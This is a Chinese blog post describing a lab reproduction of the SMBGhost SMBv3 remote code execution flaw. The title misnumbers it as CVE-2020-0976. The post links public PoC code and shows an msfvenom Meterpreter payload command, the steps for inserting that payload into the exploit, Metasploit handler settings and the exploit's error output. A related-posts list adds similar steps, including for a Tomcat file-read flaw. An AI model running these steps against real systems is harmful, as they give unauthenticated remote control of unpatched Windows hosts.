CVE-2020-0976永恒之黑漏洞复现

最新推荐文章于 2024-05-07 11:43:53 发布
最新推荐文章于 2024-05-07 11:43:53 发布
阅读量3.9k 收藏 8
点赞数 2
分类专栏: 漏洞挖掘 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36918532/article/details/123457432
版权

漏洞原理

SMB远程代码执行漏洞

SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

影响版本

Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标

漏洞所需工具

漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
攻击poc:https://github.com/eerykitty/CVE-2020-0796-PoC
shell脚本:https://github.com/chompie1337/SMBGhost_RCE_PoC
攻击机:Windows 10 20h2+kali
目标机:Windows 10 1903

蓝屏复现

首先扫描漏洞是否存在,然后把防火墙关掉
在这里插入图片描述
然后下载poc攻击试试(中间执行报错,却什么包,就安装就行了)

python CVE-2020-0796.py 192.168.1.33

在这里插入图片描述

远程利用复现

前面已经复现过MS_06_040,跟MS08067,今天仍然是使用kali里面的漏洞利用工具集
首先使用msf生成一个反向链接的payload

msfvenom  -p windows/x64/meterpreter/bind_tcp -b '\x00'  lport=1234 -f py -i 1 -o evil.py

在这里插入图片描述
然后将生成的py文件里面的文件复制到,RCE的exploit.py中(VS打开,按住Alt可以选择多少列复制)
或者直接复制到记事本,然后将buf替换为USER_PAYLOAD
在这里插入图片描述
然后msf坚挺本地端口

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 1234
set rhost 192.168.1.33
run#exploit 两个命令都行

这里lport就是端口,前面生成payload时候指定的,然后rhost就是目标的IP,然后执行
怕不放心的话可以show options来查看是否修改成功
在这里插入图片描述
然后我蓝屏了…看git上那些作者下面的问题,也有很多人都是这样,看来这个exp并不稳定
有时候报这个错,但是不蓝屏

Traceback (most recent call last):
  File "exploit.py", line 470, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 431, in do_rce
    find_low_stub(ip, port)
  File "exploit.py", line 410, in find_low_stub
    buff = read_physmem_primitive(ip, port, index)
  File "exploit.py", line 210, in read_physmem_primitive
    buff = try_read_physmem_primitive(ip, port, phys_addr)
  File "exploit.py", line 223, in try_read_physmem_primitive
    sock = reconnect(ip, port)
  File "exploit.py", line 180, in reconnect
    sock.connect((ip, port))
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.timeout: timed out

然后改了改尺寸,又报其他错
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7b1c0000000
[-] failed to find PML4 self reference entry!
在这里插入图片描述
然后,又报新错误
[-] physical read primitive failed
在这里插入图片描述
多试几次,终于好了
在这里插入图片描述
终于成功了
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

是脆脆啊
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WIN10永恒CVE-2020-0796漏洞复现获取getshell(未成功)可蓝屏
qq_35258210的博客
02-03 1572
exploit:https://codechina.csdn.net/mirrors/chompie1337/SMBGhost_RCE_PoC?utm_source=csdn_github_accelerator 目标主机 把防火墙关了 关闭后可以ping通之后 连接反向木马 msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python 看到buf=。。。。这些编码全部复制下.
CVE-2020-0796(永恒)漏洞复现
m0_73263892的博客
06-30 592
靶机:win 10攻击机:kalipython脚本:链接:https://pan.baidu.com/s/1GgInswJJC2RkSGdJk1_V5g?pwd=kt4r提取码:kt4r。
CVE-2020-0796漏洞复现拿到目标shell权限(附POC)-报错解决-爬坑记录-绕坑必看-永恒复现-win10漏洞
byt8563的博客
07-13 5035
本实验仅供学习参考,请勿非法利用! 前言 最近终于成功的复现了下之前比较火的“永恒”,最近正好无意间找到了获取目标Shell的POC。坑点较多(各种报错+蓝屏),本次记录主要是为正在“爬坑”的同学做些参考,希望对您有所帮助。 报错:failed to find PML4 self reference entry! 报错:physical read primitive failed! 蓝屏代码: 漏洞描述 2020年3月,微软公布SMB远程代码执行漏洞CVE-2020-0796)又称“永恒”,该漏洞
永恒复现
最新发布
qq_67181251的博客
05-07 1815
二进制漏洞是可执行文件(PE、ELF文件等)因编码时考虑不周,造成的软件执行了非预期的功能。由于二进制漏洞大都涉及到系统层面,所以危害程度比较高。比如经典的office栈溢出漏洞CVE-2012-0158)、(CVE-2017-11882)以及(CVE-2017-11882)的补丁绕过漏洞CVE-2018-0802)等,都是危险程度极高的0day和1day漏洞。栈溢出漏洞(Stack-Overflow)堆溢出漏洞(Heap-Overflow)释放后重引用漏洞(Use-After-Free)
漏洞复现CVE-2020-0796永恒漏洞复现
qq_45244158的博客
03-29 1万+
文章目录一、漏洞描述二、影响版本三、漏洞检测四、漏洞复现环境五、(1)漏洞利用之蓝屏五、(2)漏洞利用之本地提权五、(3)漏洞利用之反弹shell1、使用msfvenom生成payload2、替换payload3. 开启msf监听模块4. 运行exploit.py脚本,发起攻击反弹shell5. 执行成功,查看监听的地方,成功得到shell六、修复建议1.安装官方补丁2.禁用SMBv3压缩3.设置防火墙策略关闭相关端口4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务 一、漏洞描述.
cve-2020-0796_CVE20200796 | Windows SMBv3客户端/永痕之漏洞复现
weixin_39661129的博客
11-21 387
0x01漏洞介绍2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,Microsoft Guidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3....
Kali:简单实现永恒复现漏洞CVE-2020-0796
2201_75638644的博客
03-12 1035
Kali:简单实现永恒复现漏洞CVE-2020-0796,2017年时微软爆出了高危漏洞——永恒之蓝,3年后微软又爆出了一个继永恒之蓝的高危漏洞——永恒,该漏洞所瞄准的服务都是SMB服务。这些漏洞现在都只能是做为初始kali渗透玩家的最基础攻击教程的素材,也只是来用于了解一下基础知识和这么一个使用流程。永恒CVE-2020-0796)是一种影响Windows 10版本1903和1909的漏洞,存在于SMBv3协议中。其他版本的Windows操作系统不受此漏洞影响。
CVE-2020-0796 POC 永恒 POC SMBGhost POC
10-15
CVE-2020-0796 POC 利用SMBv3远程代码执行漏洞 POC 永恒 POC SMBGhost POC 建议用户及时使用POC自查,如存在漏洞及时进行安全加固
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
永恒 漏洞复现
lianliandad的博客
11-01 904
好好学习
CVE-2020-0796漏洞复现
blue_fantasy的博客
01-10 1009
Text. Text. 网上现在已经有很多复现的文章了,我也做一个学习总结。 0x00 漏洞描述 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包
《MS17-010(永恒之蓝)—漏洞复现及防范》
weixin_47118413的博客
04-10 1万+
通过Kali使用msfconsole在Win7复现MS17-010(永恒之蓝)漏洞以及如何防范。
kali-蓝屏攻击(ms12-020)
热门推荐
臭nana的博客
03-02 1万+
打开kali终端,输入msfconsole,等待一段时间后,进入msf控制端 输入search ms12-020,这条指令是搜索ms12-020模块 上面那个auxiliary/dos/windows/rdp/ms12_020_maxchannelids是攻击模块,我们先不看,先看下面的搜索模块 输入useauxiliary/scanner/rdp/ms12_020_check 然...
SMB-2
H2SO2的专栏
05-14 1316
Samba服务工作原理Samba服务工作原理Samba服务的具体工作过程如图所示。① 首先客户端发送一个SMB negprot请求数据报,并列出它所支持的所有SMB协议版本。服务器收到请求信息后响应请求,并列出希望使用的协议版本。如果没有可使用的协议版本则返回0XFFFFH,结束通信。② 协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SesssetupX请求
cve2020-0796代码执行漏洞复现详细过程(不成功)
anlalu233的博客
06-06 5301
win10:192.168.254.129 kali:192.168.254.128 生成反向连接木马: msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python kali打开msf: use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set lport 4444 set rhost 192.168.254.1
Tomact_CVE-2020-1938漏洞复现
08-31
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 复现漏洞:使用以下命令触发漏洞复现: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你复现Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞复现时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞复现](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值